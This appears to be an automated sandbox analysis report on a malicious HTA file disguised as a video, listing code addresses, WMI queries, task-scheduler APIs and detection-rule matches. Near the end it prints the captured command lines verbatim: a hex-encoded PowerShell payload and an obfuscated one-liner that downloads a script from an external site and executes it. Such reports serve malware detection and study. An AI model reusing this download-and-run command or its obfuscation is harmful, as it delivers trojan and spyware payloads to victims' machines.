Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003ABE00	10_2_003ABE00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00378710	10_2_00378710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037AF0D	10_2_0037AF0D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037CF4B	10_2_0037CF4B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A0FA9	10_2_003A0FA9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037DF94	10_2_0037DF94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003B0000	10_2_003B0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039F8B6	10_2_0039F8B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038988F	10_2_0038988F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037A8D0	10_2_0037A8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038E92F	10_2_0038E92F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039A100	10_2_0039A100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00385102	10_2_00385102
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038F950	10_2_0038F950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038C950	10_2_0038C950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038E150	10_2_0038E150
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00373940	10_2_00373940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00375980	10_2_00375980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003791F0	10_2_003791F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003979D0	10_2_003979D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A91D0	10_2_003A91D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AF9D0	10_2_003AF9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00376270	10_2_00376270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00390270	10_2_00390270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037F250	10_2_0037F250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AF250	10_2_003AF250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00395A40	10_2_00395A40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038DAA8	10_2_0038DAA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003742F0	10_2_003742F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003B02E0	10_2_003B02E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037CAD0	10_2_0037CAD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A72C9	10_2_003A72C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00388328	10_2_00388328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039F301	10_2_0039F301
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00398B70	10_2_00398B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AC360	10_2_003AC360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038739F	10_2_0038739F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AF430	10_2_003AF430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00388C28	10_2_00388C28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00394428	10_2_00394428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038B470	10_2_0038B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A1C70	10_2_003A1C70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AEC5E	10_2_003AEC5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037DC4E	10_2_0037DC4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037C44A	10_2_0037C44A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003984B0	10_2_003984B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00387CF1	10_2_00387CF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003774E0	10_2_003774E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AD4CF	10_2_003AD4CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003914C0	10_2_003914C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00399CC0	10_2_00399CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AF4C0	10_2_003AF4C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A7CC0	10_2_003A7CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038E524	10_2_0038E524
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A9500	10_2_003A9500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038FD70	10_2_0038FD70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00393D70	10_2_00393D70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AF550	10_2_003AF550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00386548	10_2_00386548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AFD90	10_2_003AFD90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00395DC0	10_2_00395DC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00398633	10_2_00398633
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A9E27	10_2_003A9E27
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00386E10	10_2_00386E10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00379600	10_2_00379600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039667A	10_2_0039667A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A666A	10_2_003A666A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038F650	10_2_0038F650
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00385656	10_2_00385656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038D6F4	10_2_0038D6F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00381EED	10_2_00381EED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039AEE0	10_2_0039AEE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003876E3	10_2_003876E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003B06C0	10_2_003B06C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A7F20	10_2_003A7F20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039DF11	10_2_0039DF11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00376700	10_2_00376700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AC770	10_2_003AC770
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00372F40	10_2_00372F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00388328	10_2_00388328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00395FA6	10_2_00395FA6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003927F0	10_2_003927F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038988F	10_2_0038988F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038AFD7	10_2_0038AFD7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00378020 appears 50 times
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 003850E0 appears 44 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 5045
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 5045			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 4108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 4.2.powershell.exe.8060000.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 4.2.powershell.exe.8060000.2.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 4.2.powershell.exe.8060000.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.powershell.exe.8060000.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 4.2.powershell.exe.8060000.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@9/6@3/2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_003A8810 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

10_2_003A8810

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtvknccl.cy2.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Poket.mp4.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9